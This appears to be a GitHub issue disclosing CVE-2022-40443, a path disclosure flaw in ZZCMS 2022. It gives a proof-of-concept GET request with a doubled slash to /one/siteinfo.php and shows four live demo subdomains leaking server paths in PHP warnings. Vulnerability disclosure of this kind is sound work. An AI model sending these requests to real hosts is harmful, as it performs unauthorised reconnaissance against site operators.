CVE-2022-40443: ZZCMS absolute path information disclosure vulnerability · Issue #1 · liong007/ZZCMS

Attack vector(s):
zzcms is a set of content management system (CMS) of China’s zzcms team.
Absolute path information disclosure vulnerability exists in zzcms 2022. An unauthenticated attacker can take advantage of this vulnerability by sending a get request to “/one/siteinfo.php” (the get request is changed to “//one/siteinfo.php”) to obtain the error information returned by the server showing the location (absolute path) of the application.

Product:
ZZCMS

Version:
ZZCMS 2022

Vendor Homepage:
http://www.zzcms.net/

Software Link:
http://www.zzcms.net/download/zzcms2022.zip

or
https://github.com/liong007/ZZCMS/releases/download/ZZCMS2022/zzcms2022.zip

POC:
get request to “/one/siteinfo.php” changed to "//one/siteinfo.php", to obtain the error information returned by the server showing the location (absolute path) of the application.

Affected pages:
All pages that contain page /one/siteinfo.php

For Example :
You need to use an IP address in China to access
Case 1:
Get request http://demo.zzcms.net//one/siteinfo.php
Get the error information returned by the server showing the location (absolute path) of the application “Warning: strpos(): Empty needle in /www/users/HA165388/WEB/inc/top2.php on line 45”

Case 2:
Get request http://9.zzcms.net//one/siteinfo.php
Get the error information returned by the server showing the location (absolute path) of the application " Warning: strpos(): Empty needle in D:\jiu\inc\top2.php on line 45"

Case 3:
Get request http://hzp.zzcms.net//one/siteinfo.php
Get the error information returned by the server showing the location (absolute path) of the application " Warning: strpos(): Empty needle in D:\hzp\inc\top2.php on line 45"

Case 4:
Get request http://3158.zzcms.net//one/siteinfo.php
Get the error information returned by the server showing the location (absolute path) of the application " Warning: strpos(): Empty needle in D:\zzcms_xm\inc\top2.php on line 45"